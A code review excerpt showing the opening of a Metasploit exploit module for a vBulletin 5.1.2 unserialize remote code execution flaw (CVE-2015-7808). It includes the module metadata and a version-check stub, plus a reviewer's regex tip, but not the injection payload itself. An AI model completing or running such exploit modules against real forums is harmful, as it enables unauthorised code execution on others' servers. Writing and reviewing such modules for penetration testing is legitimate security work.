modules/exploits/unix/webapp/vbulletin_unserialize.rb

```diff
@@ -0,0 +1,75 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'vBulletin 5.1.2 Unserialize Code Execution',
+      'Description'    => %q{
+        This module exploits a PHP object injection vulnerability in vBulletin 5.1.2 to 5.1.9
+      },
+      'Platform'       => 'php',
+      'License'        => MSF_LICENSE,
+      'Author'         => [
+          'Netanel Rubin',  # reported by
+          'cutz',  # original exploit
+          'Julien (jvoisin) Voisin',  # metasploit module
+      ],
+      'Payload'        =>
+        {
+          'BadChars'    => "\x22",
+        },
+      'References'     =>
+        [
+          ['CVE', '2015-7808'],
+          ['EDB', '38629'],
+          ['URL', 'http://pastie.org/pastes/10527766/text?key=wq1hgkcj4afb9ipqzllsq'],
+          ['URL', 'http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/']
+        ],
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['vBulletin 5.1.2', {}]],
+      'DisclosureDate' => 'Nov 4 2015',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [ true, "The base path to the web application", "/"])
+        ], self.class)
+  end
+
+  def check
+    res = send_request_cgi({ 'uri' => '/' })
+    if (res && res.body =~ /Version 5.1./ && res.body =~ /Copyright &copy; 2015 vBulletin Solutions, Inc./)
```

Comment:
Remember to escape the dots :-)

Or if you want, you can do: ```res.body.include?()```, which doesn't use a regex.